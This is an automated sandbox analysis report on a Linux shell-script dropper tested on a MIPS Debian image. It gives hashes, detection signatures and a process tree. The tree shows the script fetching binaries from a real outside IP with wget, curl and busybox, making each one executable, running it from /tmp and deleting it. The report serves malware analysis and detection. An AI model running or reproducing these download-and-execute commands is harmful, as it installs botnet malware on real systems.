Analysis
-
max time kernel
127s -
max time network
132s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21-11-2024 07:02
Static task
static1
Behavioral task
behavioral1
Sample
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
-
Size
10KB
-
MD5
a1defdb85efc4f43f3026f633f9d8642
-
SHA1
50c5a077d2f6661aae89e985d3ed38d1c6678db1
-
SHA256
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2
-
SHA512
ccce629290ff01417dcfcaa9313b1d4fe996f2d0131a5e211a0d9b41c81883bc0aced8f92fce2e96cc8216fcd2be2d5c1703f77c54706880e444a2bbe868b459
-
SSDEEP
192:hhYH7jooSYSyovzbEXvHC+OU1RZEEhWsRH7jooECSyovzkXvHC+V1RZEEs:Pp1tOo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 975 chmod 867 chmod 885 chmod 903 chmod 945 chmod 754 chmod 873 chmod 879 chmod 909 chmod 969 chmod 927 chmod 939 chmod 963 chmod 951 chmod 740 chmod 747 chmod 897 chmod 921 chmod 981 chmod 808 chmod 825 chmod 915 chmod 957 chmod 777 chmod 819 chmod 849 chmod 933 chmod 891 chmod -
Executes dropped EXE 28 IoCs
Processes:
tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoee8NickSVHHGc0CKiNoIeQQeLHFwsfykCoztEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9NeEfuuLaOesxwARQirEHUr8hwbo6uUPtCmWoUgB7802yL8EGGk7pLs8LQPIEsBTddncmWwnZK2byWknzW1gXWixRxIyczawUsL7rR9c8zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZUqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdOJXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ7xcf066zx6JjlSH0geP2dCyq8I4938BMoGxlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4aGHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4acayWFU8o0VGt74yfWT1bYNSzBkMqiwstoetQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Nee8NickSVHHGc0CKiNoIeQQeLHFwsfykCozJXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ7xcf066zx6JjlSH0geP2dCyq8I4938BMoGEfuuLaOesxwARQirEHUr8hwbo6uUPtCmWoUgB7802yL8EGGk7pLs8LQPIEsBTddncmWwnZK2byWknzW1gXWixRxIyczawUsL7rR9c8zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZUqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdOioc pid process /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 741 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe 748 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz 756 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne 779 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo 809 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw 820 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 826 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ 850 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO 868 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ 874 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG 880 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc 886 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a 892 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 898 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 904 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc 910 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a 916 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe 922 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 928 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne 934 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz 940 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ 946 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG 952 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo 958 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw 964 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 970 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ 976 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO 982 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 curl File opened for modification /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz curl File opened for modification /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw curl File opened for modification /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ curl File opened for modification /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 curl File opened for modification /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc curl File opened for modification /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz curl File opened for modification /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo curl File opened for modification /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe curl File opened for modification /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe curl File opened for modification /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo curl File opened for modification /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a curl File opened for modification /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw curl File opened for modification /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ curl File opened for modification /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne curl File opened for modification /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 curl File opened for modification /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG curl File opened for modification /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 curl File opened for modification /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ curl File opened for modification /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO curl File opened for modification /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG curl File opened for modification /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc curl File opened for modification /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 curl File opened for modification /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ curl File opened for modification /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 curl File opened for modification /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne curl File opened for modification /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO curl File opened for modification /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a curl
Processes
-
/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh1⤵PID:709
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵PID:718
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:727
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵PID:737
-
-
/bin/chmodchmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵PID:742
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵PID:743
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵PID:746
-
-
/bin/chmodchmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵PID:749
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵PID:750
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵PID:752
-
-
/bin/chmodchmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵PID:758
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵PID:759
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵PID:774
-
-
/bin/chmodchmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵PID:782
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵PID:783
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:789
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵PID:804
-
-
/bin/chmodchmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵PID:813
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵PID:814
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵PID:818
-
-
/bin/chmodchmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵PID:821
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵PID:822
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵PID:824
-
-
/bin/chmodchmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8./nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵PID:830
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵PID:831
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵PID:845
-
-
/bin/chmodchmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵PID:853
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵PID:855
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵PID:866
-
-
/bin/chmodchmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵PID:869
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵PID:870
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵PID:872
-
-
/bin/chmodchmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵PID:875
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵PID:876
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵PID:878
-
-
/bin/chmodchmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵PID:881
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵PID:882
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵PID:884
-
-
/bin/chmodchmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵PID:887
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵PID:888
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵PID:890
-
-
/bin/chmodchmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵PID:893
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵PID:894
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵PID:896
-
-
/bin/chmodchmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵PID:899
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵PID:900
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵PID:902
-
-
/bin/chmodchmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵PID:905
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵PID:906
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵PID:908
-
-
/bin/chmodchmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵PID:911
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵PID:912
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵PID:914
-
-
/bin/chmodchmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵PID:917
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵PID:918
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵PID:920
-
-
/bin/chmodchmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵PID:923
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵PID:924
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵PID:926
-
-
/bin/chmodchmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- File and Directory Permissions Modification
PID:927
-
-
